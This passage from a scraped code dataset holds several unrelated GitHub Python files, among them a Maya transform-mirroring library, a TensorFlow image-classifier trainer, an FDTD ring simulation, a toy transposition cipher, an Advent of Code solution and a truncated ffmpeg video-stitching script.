object_.getMatrix(worldSpace=True).inverse()\n\ndef getMultMatrix(mat1, mat2):\n \"\"\"Get the matrix from multiply\n\n Arguments:\n mat1 (matrix): The first input Matrix.\n mat2 (matrix): The second input Matrix.\n\n Returns:\n matrix : mult matrix\n\n \"\"\"\n return mat1*mat2\n\ndef matrixList_(matrix_):\n \"\"\"Get the list from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n\n Returns:\n list : matrix array list\n\n \"\"\"\n list_=[]\n array_ = matrix_.get()\n for i,a in enumerate(array_):\n for j in a:\n list_.append(j)\n return list_\n\ndef setMatrixAxis_(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n flipMatrix = dt.Matrix()\n \n if axis_ == 'x':\n matrix_value=[-1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'y':\n matrix_value=[1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1]\n \n elif axis_ == 'z':\n matrix_value=[1, 0, 0, 0, 0, 1, 0, 0, 0, 0, -1, 0, 0, 0, 0, 1]\n \n \n if matrix_value:\n om.MScriptUtil.createMatrixFromList(matrix_value, flipMatrix)\n \n return matrix_*flipMatrix\n\ndef setMatrixPos(matrix_, axis_):\n \"\"\"Get the FlipAxis from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n 
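# flatten the matrix into a list so the translation components can be sign-flipped\n 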
data_=matrixList_(matrix_)\n\n if axis_ == 'x':\n data_[12] *= -1.0\n\n elif axis_ == 'y':\n data_[13] *= -1.0\n\n elif axis_ == 'z':\n data_[14] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n \ndef setMatrixRot_(matrix_, axis_):\n \"\"\"Get the FlipRotate from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): flip axis\n\n Returns:\n matrix : fliped matrix\n\n \"\"\"\n data_ = matrixList_(matrix_)\n if axis_ == 'x':\n data_[0] *= -1.0\n data_[1] *= -1.0\n data_[2] *= -1.0\n\n elif axis_ == 'y':\n data_[4] *= -1.0\n data_[5] *= -1.0\n data_[6] *= -1.0\n\n elif axis_ == 'z':\n data_[8] *= -1.0\n data_[9] *= -1.0\n data_[10] *= -1.0\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef setMatrixFromList(list_):\n\n matrix_ = dt.Matrix()\n data_ = matrixList_(matrix_)\n data_[0] = list_[0]\n data_[1] = list_[1]\n data_[2] = list_[2]\n data_[4] = list_[3]\n data_[5] = list_[4]\n data_[6] = list_[5]\n data_[8] = list_[6]\n data_[9] = list_[7]\n data_[10] = list_[8]\n data_[12] = list_[9]\n data_[13] = list_[10]\n data_[14] = list_[11]\n\n om.MScriptUtil.createMatrixFromList(data_, matrix_)\n\n return matrix_\n\ndef mirrorMatrix_(matrix_, axis_=None, type_=None):\n \"\"\"Get the mirror matrix from matrix\n\n Arguments:\n matrix_ (matrix): The input Matrix.\n axis_ (axis): 'x', 'y', 'z'\n type_ (mirror type): 'flip', 'rot', 'pos'\n\n Returns:\n matrix : mirror matrix\n\n \"\"\"\n if type_ == 'flip':\n getMatrix_ = setMatrixAxis_(matrix_, axis_)\n if type_ == 'rot':\n getMatrix_ = setMatrixRot_(matrix_, axis_)\n if type_ == 'pos':\n getMatrix_ = setMatrixPos(matrix_, axis_)\n return getMatrix_\n\n\ndef mirror_(items, targets, axis='xy'):\n \"\"\"Mirror the transform by selecting the top item and top target\n\n Arguments:\n axis_ (axis): 'xy', 'xz', 'yx', 'yz', 'zx', 'zy'\n\n Returns:\n matrix : transform mirror\n\n \"\"\"\n if axis == 'xy':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'y'\n \n elif axis == 'xz':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'z'\n elif axis == 'yx':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'x'\n \n elif axis == 'yz':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'z'\n \n elif axis == 'zx':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'x'\n \n elif axis == 'zy':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'y'\n \n for i,item in enumerate(items): \n matrix_ = item.getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(matrix_, axis_=pAxis_, type_='flip')\n if i>0:\n PInvMatrix_ = getInverseTransform(targets[i].getParent())\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n localmatrix_ = targets[i].getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=rAxis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=r2Axis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n makeIdentity(targets[i], apply=1, t=0, r=1, s=1, n=0, pn=1)\n\ndef getLocalTrans(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n wm_ = item.getMatrix(worldSpace=True)\n targetParent_ = targets[i].getParent()\n wim_ = targetParent_.getMatrix(worldSpace=True).inverse()\n multM_ = wm_*wim_\n getLocalTrans_ = multM_[-1][:-1]\n return getLocalTrans_.get()\n\ndef getTransformLookingAt(pos, lookat, normal, axis=\"xy\", negate=False):\n \"\"\"Return a transformation mstrix using vector 
positions.\n Return the transformation matrix of the dagNode oriented looking to\n an specific point.\n Arguments:\n pos (vector): The position for the transformation\n lookat (vector): The aiming position to stablish the orientation\n normal (vector): The normal control the transformation roll.\n axis (str): The 2 axis used for lookat and normal. Default \"xy\"\n negate (bool): If true, invert the aiming direction.\n Returns:\n matrix: The transformation matrix\n >>> t = tra.getTransformLookingAt(self.guide.pos[\"heel\"],\n self.guide.apos[-4],\n self.normal,\n \"xz\",\n self.negate)\n \"\"\"\n normal.normalize()\n\n if negate:\n a = pos - lookat\n else:\n a = lookat - pos\n\n a.normalize()\n c = util.cross(a, normal)\n c.normalize()\n b = util.cross(c, a)\n b.normalize()\n\n if axis == \"xy\":\n X = a\n Y = b\n Z = c\n elif axis == \"xz\":\n X = a\n Z = b\n Y = -c\n elif axis == \"yx\":\n Y = a\n X = b\n Z = -c\n elif axis == \"yz\":\n Y = a\n Z = b\n X = c\n elif axis == \"zx\":\n Z = a\n X = b\n Y = c\n elif axis == \"z-x\":\n Z = a\n X = -b\n Y = -c\n elif axis == \"zy\":\n Z = a\n Y = b\n X = -c\n\n elif axis == \"x-y\":\n X = a\n Y = -b\n Z = -c\n elif axis == \"-xz\":\n X = -a\n Z = b\n Y = c\n elif axis == \"-xy\":\n X = -a\n Y = b\n Z = c\n\n m = dt.Matrix()\n m[0] = [X[0], X[1], X[2], 0.0]\n m[1] = [Y[0], Y[1], Y[2], 0.0]\n m[2] = [Z[0], Z[1], Z[2], 0.0]\n m[3] = [pos[0], pos[1], pos[2], 1.0]\n\n return m","repo_name":"smsyes/pythonWorkSpace","sub_path":"main/mApplication/ms_module/maya/python3/rigSupport/lib/_transform.py","file_name":"_transform.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"42196857355","text":"import time\n\nimport tensorflow as tf\n\nfrom models.alexnet import AlexNet\nfrom models.vgg import VGG\nfrom models.googlenet import GoogLeNet\nfrom models.resnet import ResNet\nfrom models.inception_v2 import InceptionV2\nfrom models.inception_v3 import InceptionV3\nfrom trainers.predefined_loss import *\n\nclass ClfTrainer:\n def __init__(self, clf_model, clf_dataset):\n self.clf_model = clf_model\n self.clf_dataset = clf_dataset\n\n def __run_train__(self, sess, input, output,\n batch_i, batch_size,\n cost_func, train_op,\n scale_to_imagenet=False):\n\n total_loss = 0\n count = 0\n\n for batch_features, batch_labels in self.clf_dataset.get_training_batches_from_preprocessed(batch_i, batch_size, scale_to_imagenet):\n loss, _ = sess.run([cost_func, train_op],\n feed_dict={input: batch_features,\n output: batch_labels})\n total_loss = total_loss + loss\n count = count + 1\n\n return total_loss/count\n\n def __run_accuracy_in_valid_set__(self, sess, input, output, accuracy, batch_size, scale_to_imagenet=False):\n valid_features, valid_labels = self.clf_dataset.get_valid_set(scale_to_imagenet)\n\n valid_acc = 0\n for batch_valid_features, batch_valid_labels in self.clf_dataset.get_batches_from(valid_features, valid_labels, batch_size):\n valid_acc += sess.run(accuracy,\n feed_dict={input:batch_valid_features,\n output:batch_valid_labels})\n\n tmp_num = valid_features.shape[0]/batch_size\n return valid_acc/tmp_num\n\n def __train__(self, input, output,\n cost_func, train_op, accuracy,\n epochs, batch_size, save_model_path,\n save_every_epoch=1):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost_func, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. 
Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver = tf.train.Saver()\n saver.save(sess, save_model_path, global_step=epoch+1, write_meta_graph=False)\n\n def __get_simple_losses_and_accuracy__(self, out_layers, output, learning_rate, options=None):\n is_loss_weights_considered = False\n label_smoothings = [0 for i in range(len(out_layers))]\n\n if options is not None:\n if 'loss_weights' in options and \\\n len(options['loss_weights']) is len(out_layers):\n is_loss_weights_considered = True\n\n if 'label_smoothings' in options and \\\n len(options['label_smoothings']) is len(out_layers):\n label_smoothings = options['label_smoothings']\n\n aux_cost_sum = 0\n if is_loss_weights_considered:\n for i in range(len(out_layers) - 1):\n aux_out_layer = out_layers[i]\n aux_label_smoothing = label_smoothings[i]\n aux_cost = tf.losses.softmax_cross_entropy(output, aux_out_layer, label_smoothing=aux_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n aux_cost_sum += aux_cost * options['loss_weights'][i]\n\n final_out_layer = out_layers[len(out_layers)-1]\n final_label_smoothing = label_smoothings[len(out_layers)-1]\n cost = tf.losses.softmax_cross_entropy(output, final_out_layer, label_smoothing=final_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n\n if is_loss_weights_considered:\n cost = cost * options['loss_weights'][len(out_layers)-1]\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients = optimizer.compute_gradients(cost+aux_cost_sum)\n train_op = optimizer.apply_gradients(gradients)\n\n correct_pred = tf.equal(tf.argmax(final_out_layer, 1), tf.argmax(output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return cost, train_op, accuracy\n\n def __get_losses_and_accuracy__(self, model, output, out_layers, learning_rate, options=None):\n optimizer_from_paper_flag = True\n\n if options is None or options['optimizer_from_paper'] is False:\n optimizer_from_paper_flag = False\n\n if isinstance(model, AlexNet):\n return get_alexnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, VGG):\n return get_vgg_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, GoogLeNet):\n return get_googlenet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.3, 0.3, 1.0]})\n elif isinstance(model, ResNet):\n return get_resnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, InceptionV2):\n return get_inceptionv2_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0]})\n elif isinstance(model, InceptionV3):\n return get_inceptionv3_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n 
self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0], 'label_smoothings': [0.1, 0.1]})\n else:\n return self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, options)\n\n # default to use AdamOptimizer w/ softmax_cross_entropy_with_logits_v2\n def run_training(self,\n epochs, batch_size, learning_rate,\n save_model_to, save_every_epoch=1,\n options=None):\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n self.__train__(input, output,\n cost, train_op, accuracy,\n epochs, batch_size,\n save_model_to, save_every_epoch)\n\n def resume_training_from_ckpt(self, epochs, batch_size, learning_rate, save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver1 = tf.train.Saver()\n saver1.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_transfer_learning(self,\n epochs, batch_size, learning_rate,\n save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n var_list = []\n for var in tf.model_variables():\n if 'final' not in var.name:\n var_list.append(var)\n\n saver = tf.train.Saver(var_list)\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. 
Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver2 = tf.train.Saver()\n saver2.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_testing(self,\n data, save_model_from, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, _ = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n final_out_layer = out_layers[len(out_layers)-1]\n softmax_result = tf.nn.softmax(final_out_layer)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n results = sess.run(softmax_result,\n feed_dict={input:data})\n\n return results\n","repo_name":"deep-diver/DeepModels","sub_path":"trainers/clftrainer.py","file_name":"clftrainer.py","file_ext":"py","file_size_in_byte":12924,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"}
+{"seq_id":"3595623474","text":"car_running = False\nwhile True:\n mp = input(\">\")\n if mp.lower() == \"help\":\n print('''start - to start the car \nstop - to stop the car \nquit - to exit''')\n elif mp == \"start\":\n if not car_running:\n car_running = True\n print(\"Car started...Ready to go!\")\n else:\n print(\"Car's already started, what are you doing ?\")\n elif mp == \"stop\":\n if car_running:\n car_running = False\n print(\"car stopped.\")\n else:\n print(\"car was not running, cannot be stopped\")\n elif mp == \"quit\":\n print(\"thank you for using this product\")\n break\n else:\n # continue while loop\n print(\"I don't understand that...\")\n","repo_name":"redDevil1UR/helloworld","sub_path":"car_game.py","file_name":"car_game.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43590040634","text":"import utils\nfrom photfdtd import Ring, Grid, Solve\n\nif __name__ == \"__main__\":\n\n    background_index = 1.0\n\n    ring = Ring(\n outer_radius=100,\n zlength=20,\n x=150,\n y=150,\n z=13,\n width=20,\n length=0,\n gap=5,\n name=\"ring\",\n refractive_index=3.47,\n direction=1,\n background_index=background_index\n )\n\n grid = Grid(grid_xlength=300, grid_ylength=300, grid_zlength=25, grid_spacing=20e-9, total_time=1000,\n pml_width_x=50, pml_width_y=20, pml_width_z=1,\n permittivity=background_index ** 2, foldername=\"test_ring\")\n\n grid.set_source(\n source_type=\"planesource\",\n x=100,\n xlength=0,\n y=35,\n ylength=21,\n pulse_type=\"None\",\n z=13,\n zlength=22,\n period=1550e-9 / 299792458,\n )\n\n grid.set_detector(detector_type=\"blockdetector\",\n x=250,\n xlength=0,\n y=37,\n ylength=21,\n z=13,\n zlength=22,\n name=\"detector\")\n\n grid.add_object(ring)\n\n # Create the Solve object\n solve = Solve(grid=grid)\n\n solve._plot_(axis='z',\n index=13,\n filepath=grid.folder)\n\n grid.run()\n\n grid.save_simulation()\n\n grid.save_fig(axis=\"z\",\n axis_number=13)\n grid.save_fig(axis=\"x\",\n axis_number=150)\n\n data = Grid.read_simulation(folder=grid.folder)\n","repo_name":"phot-lab/photfdtd","sub_path":"examples/ring_ex.py","file_name":"ring_ex.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"17337429484","text":"from typing import Any, Callable, Pattern, Set, Type, Generator\nimport os\nfrom passlib.hash import pbkdf2_sha256\n\n\nclass BaseUtils:\n\n @classmethod\n def all_base_classes(cls, class_: Type) -> Set:\n base_class_set = set(class_.__bases__)\n all_base_class_set = {class_}\n all_base_class_set.update(base_class_set)\n for base in base_class_set:\n all_base_class_set.update(cls.all_base_classes(base))\n return all_base_class_set\n\n @classmethod\n def walk_all_parent_dirs(cls, path: str) -> Generator:\n \"\"\"\n Yield directories starting from the given directory up to the root\n \"\"\"\n if not os.path.exists(path):\n raise IOError(\"Starting path not found\")\n\n if os.path.isfile(path):\n path = os.path.dirname(path)\n\n last_dir = None\n current_dir = os.path.abspath(path)\n while last_dir != current_dir:\n yield current_dir\n parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))\n last_dir, current_dir = current_dir, parent_dir\n","repo_name":"mo1ein/feedbook","sub_path":"src/utils/base_utils.py","file_name":"base_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25158168515","text":"import string\nimport math\n\ndef baris_maks(panjang_plaintext):\n pola1 = 1\n pola2 = 2 \n while (pola1 < panjang_plaintext):\n pola1 = pola1 + pola2\n return math.ceil(math.sqrt(pola1))\n\n\ndef enkripsi(barismaks, plaintext, kolom, baris):\n array = [['' for y in range(int(kolom))] for x in range(int(baris))]\n penghitung_string = 0\n hasil_enkripsi = ''\n dikunjungi = [False for x in range(kolom)]\n\n for i in range(int(baris)):\n kolom_mulai = baris - i - 1\n for j in range(int(kolom)):\n if (j >= kolom_mulai and j < kolom - kolom_mulai) and len(plaintext) >= penghitung_string: \n if penghitung_string >= len(plaintext):\n array[i][j] = 'x'\n else:\n array[i][j] = plaintext[penghitung_string]\n penghitung_string = penghitung_string + 1\n if penghitung_string == len(plaintext):\n break\n\n for i in range(int(baris)):\n for j in range(int(kolom)):\n if dikunjungi[j] == False:\n for k in range(int(baris)):\n if array[k][j] != '':\n hasil_enkripsi = hasil_enkripsi + array[k][j]\n dikunjungi[j] = True\n else:\n continue\n\n return hasil_enkripsi\n\n\ndef dekripsi(barismaks, ciphertext, kolom, baris):\n # Inverse of enkripsi: rebuild the triangle shape, fill it column by column\n # with the ciphertext, then read the plaintext back row by row.\n # Assumes the ciphertext covers the whole triangle padded with 'x' by enkripsi.\n array = [['' for y in range(int(kolom))] for x in range(int(baris))]\n penghitung_string = 0\n hasil_dekripsi = ''\n\n for j in range(int(kolom)):\n for i in range(int(baris)):\n kolom_mulai = baris - i - 1\n if (j >= kolom_mulai and j < kolom - kolom_mulai) and penghitung_string < len(ciphertext):\n array[i][j] = ciphertext[penghitung_string]\n penghitung_string = penghitung_string + 1\n\n for i in range(int(baris)):\n for j in range(int(kolom)):\n if array[i][j] != '':\n hasil_dekripsi = hasil_dekripsi + array[i][j]\n\n return hasil_dekripsi\n\n\ndef main():\n plaintext = 'ikanhiumakantomat'\n panjang_plaintext = len(plaintext)\n barismaks = baris_maks(panjang_plaintext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(enkripsi(barismaks, plaintext, kolom, baris))\n\n ciphertext = \"tkxhaxkinxiautxnmoxamxaxx\"\n panjang_ciphertext = len(ciphertext)\n barismaks = baris_maks(panjang_ciphertext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(dekripsi(barismaks, ciphertext, kolom, baris))\n\nif __name__ == \"__main__\":\n main()","repo_name":"suriadivjr/uasPrakKripto","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37121531945","text":"import itertools\nimport functools\nimport re\nimport math\n\nfrom copy import deepcopy\n\nINPUT_FILE = 'input.txt'\n\ndef read_file(filename, func=None):\n result = []\n with open(filename, 'r') as f:\n for line in f:\n result.append(func(line.strip()) if func else line.strip())\n return result\n\ndef main1():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n for l in lines:\n inst, value = l.split(' ')\n value = int(value)\n if inst == \"forward\":\n position += value\n elif inst == \"down\":\n depth += value\n else:\n depth -= value\n print(position * depth)\n\ndef main2():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n aim = 0\n for l in lines:\n inst, value = l.split(' ')\n if inst == \"forward\":\n position += int(value)\n depth += aim * int(value)\n elif inst == \"down\":\n aim += int(value)\n else:\n aim -= int(value)\n print(depth * position)\n \nif __name__ == \"__main__\":\n main1()\n main2()\n","repo_name":"Universemul/AdventOfCode2021","sub_path":"python/day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27413717564","text":"import os\nimport inspect\nimport click\nimport tempfile\nimport shutil\nimport subprocess\nimport logging\nimport time\n\nimport stitch_common as sc\n\nFILE_ENDING = 'mp4'\nMAX_ATTEMPTS = 3\nLOCAL_FFMPEG_PATH = 'ffmpeg/bin'\n\n\n@click.command()\n@click.argument('root_dir')\n@click.argument('base_out_dir')\n@click.option('--root_tmp_dir', default=None, help='Where tmp folders should be generated')\n@click.option('--rename_on_copy', default=True, is_flag=True)\n@click.option('--local_ffmpeg', default=True, is_flag=True)\ndef stitch_videos(root_dir, base_out_dir, root_tmp_dir, rename_on_copy, local_ffmpeg):\n if root_tmp_dir:\n logging.info('Setting directory where temp folders will be created: \"{}\".'.format(root_tmp_dir))\n os.environ['TMPDIR'] = root_tmp_dir\n\n if local_ffmpeg:\n ffmpeg_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getsourcefile(lambda: 0))),\n LOCAL_FFMPEG_PATH)\n if not os.path.isdir(ffmpeg_path):\n logging.fatal('ffmpeg path is incorrect:'.format(ffmpeg_path))\n else:\n ffmpeg_path = 'ffmpeg'\n\n logging.info('Using ffmpeg: {}'.format(ffmpeg_path))\n\n logging.info('Starting the stitching process.')\n if rename_on_copy:\n logging.info('** Rename on copy mode enabled.')\n # We have a number of renaming strategies:\n # 1) if there is only a single directory that contains the files, assume it is a full trip + set code\n # 2) if there are two directories, assume the first is the trip code and the second the set code\n # 3) if there are three directories, follow assumption (2) and add a stereo L or R directory\n for trip_name in get_subdirs(root_dir):\n trip_path = os.path.join(root_dir, trip_name)\n join_mp4s(trip_path, base_out_dir, '{}.mp4'.format(trip_name), ffmpeg_path)\n for set_name in get_subdirs(trip_path):\n set_path = os.path.join(trip_path, set_name)\n join_mp4s(set_path, base_out_dir, '{}_{}.mp4'.format(trip_name, set_name), ffmpeg_path)\n for camera in get_subdirs(set_path):\n camera_path = os.path.join(set_path, camera)\n if camera.lower().startswith('l'):\n camera_abbrv = 'L'\n elif camera.lower().startswith('r'):\n camera_abbrv = 'R'\n else:\n logging.warning('Unexpected camera folder: {}'.format(camera_path))\n break\n join_mp4s(camera_path, base_out_dir, '{}_{}_{}.mp4'.format(trip_name, set_name, camera_abbrv),\n ffmpeg_path)\n else:\n for root, subdirs, files in os.walk(root_dir):\n directory = remove_prefix(root, root_dir)\n out_dir = base_out_dir + os.path.sep + directory\n out_file_name = 'joined.' 
+ FILE_ENDING\n if os.path.exists(out_file_name):\n logging.warning('***Skipping: \"{}\" already exists'.format(out_file_name))\n else:\n join_mp4s(root, out_dir, out_file_name, ffmpeg_path)\n\n\ndef join_mp4s(in_dir, out_dir, out_file_name, ffmpeg_path):\n files = get_files(in_dir)\n attempt_count = 0\n while attempt_count < MAX_ATTEMPTS:\n attempt_count += 1\n with tempfile.TemporaryDirectory() as tmpdir:\n logging.info('**** Processing folder: {}'.format(in_dir))\n mp4s = sorted([fi for fi in files if not fi.startswith('._')])\n file_text = ''\n # mp4s should be sorted alpha\n for vid in mp4s:\n logging.info('Copying video {}'.format(vid))\n shutil.copyfile(in_dir + os.path.sep + vid, tmpdir + os.path.sep + vid)\n if vid.lower().endswith('.mts'):\n logging.info('Processing mts videos')\n output_name = vid.rsplit('.', 1)\n output_file = output_name[0] + '.mp4'\n mts_to_mp4(tmpdir, ffmpeg_path, vid, output_file)\n file_text += \"file '{}/{}'\\n\".format(tmpdir, output_file)\n else:\n file_text += \"file '{}/{}'\\n\".format(tmpdir, vid)\n if len(mp4s) > 0:\n mp4_list_file = open('{}/mp4_list.txt'.format(tmpdir), 'w')\n mp4_list_file.write(file_text)\n mp4_list_file.close()\n\n concat_mp4s(tmpdir, ffmpeg_path)\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if FILE_ENDING == 'avi':\n mp4_to_avi(tmpdir, ffmpeg_path)\n\n joined_file = tmpdir + os.path.sep + 'joined.' + FILE_ENDING\n if len(sc.get_video_details(joined_file, ffmpeg_path)) == 0:\n logging.error('Joined file is unreadable! Trying again in a minute.')\n time.sleep(60)\n else:\n logging.info('-----------------------------------------')\n # get fps values\n output_result = check_fps(tmpdir, ffmpeg_path, joined_file)\n split_array = output_result.split(\"/\")\n numerator = int(split_array[0])\n denominator = int(split_array[1])\n # do the math\n math = numerator / denominator\n\n if math > 30:\n downsample(tmpdir, ffmpeg_path, joined_file)\n ouput_file = tmpdir + os.path.sep + 'output.' 
+ FILE_ENDING\n logging.info('Copying {} to final location...'.format(ouput_file))\n shutil.copyfile(\n ouput_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('Copying {} to final location...'.format(joined_file))\n shutil.copyfile(\n joined_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('No mp4s found in folder.')\n attempt_count = MAX_ATTEMPTS\n if attempt_count >= MAX_ATTEMPTS:\n logging.error('Giving up after multiple retries trying to stitch {}'.format(in_dir))\n\n\ndef get_subdirs(folder):\n return [xx for xx in os.listdir(folder) if os.path.isdir(os.path.join(folder, xx))]\n\n\ndef get_files(folder):\n return [xx for xx in os.listdir(folder) if os.path.isfile(os.path.join(folder, xx))]\n\n\ndef concat_mp4s(tmpdir, ffmpeg_path):\n logging.info('Concatenating mp4s...')\n run_external_command(\n '{} -f concat -safe 0 -i mp4_list.txt -c copy joined.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef mp4_to_avi(tmpdir, ffmpeg_path):\n 